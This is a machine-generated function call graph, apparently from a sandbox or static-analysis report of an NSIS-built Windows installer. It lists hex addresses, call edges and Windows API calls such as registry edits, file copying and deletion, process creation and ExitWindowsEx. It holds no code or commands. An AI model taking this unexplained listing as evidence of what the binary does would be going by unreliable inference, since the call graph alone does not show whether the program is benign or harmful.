4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 